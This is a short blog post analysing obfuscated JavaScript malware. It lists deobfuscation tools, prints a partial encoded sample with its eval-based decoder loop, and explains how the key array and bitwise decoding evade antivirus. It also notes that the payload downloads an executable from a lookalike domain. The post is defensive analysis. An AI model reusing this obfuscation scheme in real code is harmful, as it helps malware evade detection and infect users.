Monday, December 1, 2008

Web Based Malware Analysis

Working on a Javascript malware analysis, here are some useful tools that can help:
Rhino
http://www.mozilla.org/rhino/
Malzilla
http://malzilla.sourceforge.net/
Caffeine monkey
http://www.mozilla.org/js/spidermonkey/
FreShow
http://www.jimmyleo.com/work/FreShowStart.htm
DecryptJS:
http://www.ukhoneynet.org/tools/decrypt-js/


I came across this malicious JavaScript
AAA=Array(63/**/,0/**/,0/**/,0/**/,0/**/,0/**/,0/**/,0/**/,0/**/,0/**/,0/**/,0/**/,0/**/,0/**/,0/**/,42/**/,0/**/,22/**/,32/**/,47/**/,40/**/,50/**/,56/**/,60/**/,11/**/,0/**/,0/**/,0/**/,0/**/,0/**/,0/**/,54/**/,8/**/,27/**/,45/**/,43/**/,58/**/,41/**/,31/**/,26/**/,2/**/,4/**/,17/**/,59/**/,44/**/,20/**/,28/**/,18/**/,19/**/,16/**/,52/**/,46/**/,61/**/,33/**/,39/**/,15/**/,14/**/,9/**/,0/**/,0/**/,0/**/,0/**/,0/**/,0/**/,13/**/,23/**/,3/**/,25/**/,55/**/,10/**/,38/**/,62/**/,7/**/,24/**/,51/**/,29/**/,12/**/,5/**/,6/**/,35/**/,37/**/,48/**/,1/**/,36/**/,21/**/,57/**/,34/**/,53/**/,49/**/,30)
BBB="I7bHEVPGEK2a41oG8VWmWO6BWl@Btx2ZFd2HtnWO .. .. . . . . . ."
CCC=3536,DDD,EEE,FFF=''
YYY=ZZZ=XXX=0
for(EEE=4;EEE>0;EEE--)
{for(DDD=Math.min(CCC,1024);DDD>0;DDD--,CCC--)
{eval('XXX|=(AAA[BBB.charCodeAt(YYY++)-33]) < <
ZZZ;');

Here are my notes:
- AAA variable is used as a key for encoding, if the attacker needs to change the code, he will just change the encoding key, this will help in the AV evading.
-
String.fromCha'+'rCode(8^XXX&255) means String.fromCharCode(8^XXX&255)
-
BBB.charCodeAt(YYY++)
this will get the
unicode value of BBB character by character, starting form character 0-1024
- let us take the first part:
I7bHEVPGEK2a41oG8VWmWO6BWl@
starting with position 0 increment by 1:
I7bHEVPGEK2a41oG8VWmWO6BWl@ ==> 73 55 98 72 69 86 80 71 69 75 50 97 52 49 111 71 56 86 87 109 87 79 54 66 87 108 64
deduct 33 from them all: 40 22 65 39 36 53 47 38 36 42 17 64 19 16 78 38 23 53 54 76 54 46 21 33 54 75 31


so look at a overall equation:
'XXX|=(AAA[BBB.charCodeAt(YYY++)-33]) < <>
"|" is bitwise OR, "<<" is shift left
- The code use bitwise OR and Shift Left for encoding
- There is an easier way to do this by using
Malzilla, and the debug feature.
- Finally the code will try to connect to google-analyse.
cn, and downloading a malicious executable file.


References:
http://rishida.net/scripts/uniview/conversion.php
http://www.eecs.umich.edu/~bartlett/jsops.html http://doc.sumy.ua/prog/jsm/ch13.htm#BitwiseOROperator
http://www.ukhoneynet.org/wp-content/uploads/2007/08/decryptjs.tgz

No comments: